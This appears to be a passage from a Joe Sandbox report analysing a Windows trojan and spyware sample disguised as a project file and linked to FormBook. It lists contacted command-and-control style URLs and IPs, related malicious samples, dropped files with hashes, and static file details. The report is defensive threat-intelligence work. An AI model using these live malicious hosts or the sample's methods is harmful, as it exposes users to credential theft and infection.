                                    http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tals.xyz/k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aballanet.cat/6xrr/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.laohub10.net/36be/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.izmirescortg.xyz/lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.brightvision.website/gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.laohub10.net/36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8=false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.brightvision.website/gn26/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.logidant.xyz/iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLOtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.canadavinreport.site/g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.madhf.tech/0mwe/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.yunlekeji.top/t322/false
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabmobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icomobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.ecosia.org/newtab/mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.brightvision.websitezZyhwwvEVl.exe, 00000007.00000002.3504903691.0000000005911000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ac.ecosia.org/autocomplete?q=mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.thinkphp.cnmobsync.exe, 00000003.00000002.3503963835.0000000005E3C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003E9C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.canadavinreport.site/g3h7/?rfJh=dyqWmobsync.exe, 00000003.00000002.3505219170.0000000007B30000.00000004.00000800.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003D0A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5amobsync.exe, 00000003.00000002.3503963835.0000000005986000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.00000000039E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003B78000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3mobsync.exe, 00000003.00000002.3503963835.00000000062F2000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000004352000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      45.141.156.114
                                                      		logidant.xyzGermany
                                                      		30860YURTEH-ASUAtrue
                                                      106.15.109.33
                                                      		www.yunlekeji.topChina
                                                      		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                      172.67.187.114
                                                      		www.zkdamdjj.shopUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      13.248.169.48
                                                      		www.tals.xyzUnited States
                                                      		16509AMAZON-02USfalse
                                                      203.161.42.73
                                                      		www.brightvision.websiteMalaysia
                                                      		45899VNPT-AS-VNVNPTCorpVNfalse
                                                      23.225.159.42
                                                      		r0lqcud7.nbnnn.xyzUnited States
                                                      		40065CNSERVERSUSfalse
                                                      103.224.182.242
                                                      		www.madhf.techAustralia
                                                      		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                      185.27.134.206
                                                      		www.canadavinreport.siteUnited Kingdom
                                                      		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                      104.21.36.62
                                                      		www.izmirescortg.xyzUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      134.0.14.158
                                                      		aballanet.catSpain
                                                      		197712CDMONsistemescdmoncomEStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1567130
                                                      Start date and time:2024-12-03 06:52:43 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 48s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:8
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:YH-3-12-2024-GDL Units - Projects.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@12/10
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 49
                                                      • Number of non-executed functions: 279
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target zZyhwwvEVl.exe, PID 2924 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      45.141.156.114BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • www.logidant.xyz/iuvu/
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.logidant.xyz/ctvu/
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.logidant.xyz/ctvu/
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • www.logidant.xyz/iuvu/
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.logidant.xyz/ctvu/
                                                      106.15.109.33BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • www.yunlekeji.top/t322/
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • www.yunlekeji.top/t322/
                                                      172.67.187.114Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                      • www.zkdamdjj.shop/swhs/
                                                      TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                      • www.zkdamdjj.shop/z3j2/
                                                      13.248.169.48Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                      • www.optimismbank.xyz/98j3/
                                                      lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                      • www.avalanchefi.xyz/ctta/
                                                      BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/k1td/
                                                      PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                      • www.heliopsis.xyz/69zn/
                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.gupiao.bet/t3a1/
                                                      Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.hasan.cloud/tur7/
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.egyshare.xyz/lp5b/
                                                      attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.aktmarket.xyz/wb7v/
                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.gupiao.bet/t3a1/
                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.krshop.shop/grhe/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.madhf.techProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                      • 103.224.182.242
                                                      Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 103.224.182.242
                                                      BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • 15.204.67.7
                                                      Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 103.224.182.242
                                                      Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 103.224.182.242
                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                      • 103.224.182.242
                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                      • 103.224.182.242
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • 103.224.182.242
                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 103.224.182.242
                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                      • 103.224.182.242
                                                      www.izmirescortg.xyzOrder MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.186.192
                                                      BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.186.192
                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 172.67.186.192
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.186.192
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • 104.21.36.62
                                                      www.brightvision.websiteBASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.42.73
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • 203.161.42.73
                                                      r0lqcud7.nbnnn.xyzProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                      • 202.79.161.151
                                                      lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                      • 23.225.159.42
                                                      BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • 27.124.4.246
                                                      specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 23.225.159.42
                                                      OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                      • 202.79.161.151
                                                      ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 202.79.161.151
                                                      OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                      • 27.124.4.246
                                                      REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                      • 23.225.160.132
                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                      • 23.225.160.132
                                                      purchase Order.exeGet hashmaliciousFormBookBrowse
                                                      • 27.124.4.246

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfile.exeGet hashmaliciousUnknownBrowse
                                                      • 120.26.3.80
                                                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 47.109.175.2
                                                      la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 47.101.239.46
                                                      la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 106.14.214.167
                                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                      • 8.174.223.244
                                                      arm.nn-20241201-1515.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 115.28.220.3
                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 8.184.85.27
                                                      sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 139.249.66.217
                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 139.196.225.32
                                                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                      • 8.186.203.103
                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 104.21.16.9
                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                      • 172.67.165.166
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 172.67.165.166
                                                      P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 172.67.177.134
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 104.21.16.9
                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.18.24.163
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 172.67.165.166
                                                      http://beacons.ai/luluhime_xoGet hashmaliciousUnknownBrowse
                                                      • 104.16.79.73
                                                      http://beacons.ai/390Get hashmaliciousUnknownBrowse
                                                      • 172.67.20.182
                                                      http://beacons.ai/390Get hashmaliciousUnknownBrowse
                                                      • 104.16.79.73
                                                      AMAZON-02UShttps://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                      • 13.227.8.64
                                                      .i.elfGet hashmaliciousUnknownBrowse
                                                      • 54.171.230.55
                                                      http://frame.wtfGet hashmaliciousUnknownBrowse
                                                      • 44.238.68.12
                                                      https://emailtransaction.com/?u=84775-2a97acb5884211437e2511ddc7c4e345386c33487a558c479c7af49e7f66170eGet hashmaliciousUnknownBrowse
                                                      • 52.217.44.238
                                                      agent.elfGet hashmaliciousUnknownBrowse
                                                      • 54.171.230.55
                                                      https://nahud.com/mailwizz-2.2.7/latest/index.php/campaigns/jm929ck1nc903/track-url/wh75022djq6fe/88db1e075fc0ca4d21e7c4fe4c14b76f34a46190Get hashmaliciousUnknownBrowse
                                                      • 54.185.22.79
                                                      ub8ehJSePAfc9FYqZIT6.arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 54.171.230.55
                                                      https://pro.arawato.pro/Get hashmaliciousHTMLPhisherBrowse
                                                      • 76.76.21.21
                                                      Demon.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                      • 34.249.145.219
                                                      [EXTERNAL] Fw_ LVW 1201831..emlGet hashmaliciousUnknownBrowse
                                                      • 18.189.146.174
                                                      YURTEH-ASUABASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                      • 45.141.156.114
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • 45.141.156.114
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • 45.141.156.114
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • 45.141.156.114
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • 45.141.156.114
                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 31.42.187.210
                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 31.42.187.210
                                                      SI HE Voy - TC Relet 11.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 152.89.61.240
                                                      MV ALEXOS_VESSEL'S DESC.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 152.89.61.240
                                                      https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQGet hashmaliciousUnknownBrowse
                                                      • 152.89.61.240

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\10O4645j

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\mobsync.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):114688
                                                      Entropy (8bit):0.9746603542602881
                                                      Encrypted:false
                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\aut12E8.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.994023075119688
                                                      Encrypted:true
                                                      SSDEEP:6144:+Hn3ZKlkNEDybhfI9HGKsi+FbGEnEFg2WrV4790a:+H3ZK+C2dWQbF0z90a
                                                      MD5:9DE9110CD553FF6CB3602FF7C9416709
                                                      SHA1:3B59F6F29305FEC14EE70183A45FE1BED0A3F576
                                                      SHA-256:D060991C68F390E483E6D5961C57B8F56A46C87455E71FC5E43F18DB69D5C1D5
                                                      SHA-512:673E22133F733BCF27D37C460B5768AA235CE1D8959A451010CA5058FE294A9EBBDAF9C5703EC22A4EEBCD1540F71CFD6BD187ABDDB7DF9269D2EE3314B16B55
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.m.N75UX\BVA.47.T7FN45U.XBVA9M473T7FN45UXXBVA9M473T7FN45UXX.VA9C+.=T.O...T..c.)P>.GA;P4/Y.696,95./Q.A!Yf'Z....b;.](.:>^.FN45UXX;WH.pTP.iW!..U2.B....-S.).rTR.B..}Y*.eZ7_{.S.UXXBVA9Mdr3T{GO4.}.8BVA9M473.7DO?4^XX.RA9M473T7F. 5UXHBVAYI473.7F^45UZXBPA9M473T1FN45UXXB6E9M673T7FN65..XBFA9]473T'FN$5UXXBVQ9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45Uv,'.59M4C}P7F^45U.\BVQ9M473T7FN45UXXbVAYM473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M

                                                      C:\Users\user\AppData\Local\Temp\untraumatic

                                                      Download File
                                                      Process:C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.994023075119688
                                                      Encrypted:true
                                                      SSDEEP:6144:+Hn3ZKlkNEDybhfI9HGKsi+FbGEnEFg2WrV4790a:+H3ZK+C2dWQbF0z90a
                                                      MD5:9DE9110CD553FF6CB3602FF7C9416709
                                                      SHA1:3B59F6F29305FEC14EE70183A45FE1BED0A3F576
                                                      SHA-256:D060991C68F390E483E6D5961C57B8F56A46C87455E71FC5E43F18DB69D5C1D5
                                                      SHA-512:673E22133F733BCF27D37C460B5768AA235CE1D8959A451010CA5058FE294A9EBBDAF9C5703EC22A4EEBCD1540F71CFD6BD187ABDDB7DF9269D2EE3314B16B55
                                                      Malicious:false
                                                      Preview:.m.N75UX\BVA.47.T7FN45U.XBVA9M473T7FN45UXXBVA9M473T7FN45UXX.VA9C+.=T.O...T..c.)P>.GA;P4/Y.696,95./Q.A!Yf'Z....b;.](.:>^.FN45UXX;WH.pTP.iW!..U2.B....-S.).rTR.B..}Y*.eZ7_{.S.UXXBVA9Mdr3T{GO4.}.8BVA9M473.7DO?4^XX.RA9M473T7F. 5UXHBVAYI473.7F^45UZXBPA9M473T1FN45UXXB6E9M673T7FN65..XBFA9]473T'FN$5UXXBVQ9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45Uv,'.59M4C}P7F^45U.\BVQ9M473T7FN45UXXbVAYM473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.1960956776532194
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:YH-3-12-2024-GDL Units - Projects.exe
                                                      File size:1'213'952 bytes
                                                      MD5:36e50660f18927eb838ce85dd46778c4
                                                      SHA1:2a81b0b315cf21f286d262a12ac0666145df7bac
                                                      SHA256:ec5bf8186eac9177d93bdf735449b9b4023631dcb3e67e1e5809dc22dbba842b
                                                      SHA512:a5d3ccb7b936ba334033add5922e5ec5bbcf721609fb5641e19092da9b0cd0c1aa09ea1b8bbea3f7b324115e015e3ec60a90749d0b5769aad4c00de235bdcad2
                                                      SSDEEP:24576:uu6J33O0c+JY5UZ+XC0kGso6FaKpRP2uktTMqXrsjRWY:gu0c++OCvkGs9FaKpROukXAIY
                                                      TLSH:B945CF2273DDC360CB669173BF6AB7016EBF3C614A30B85B2F980D7DA950161162DB63
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                      File Icon

                                                      Icon Hash:aaf3e3e3938382a0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
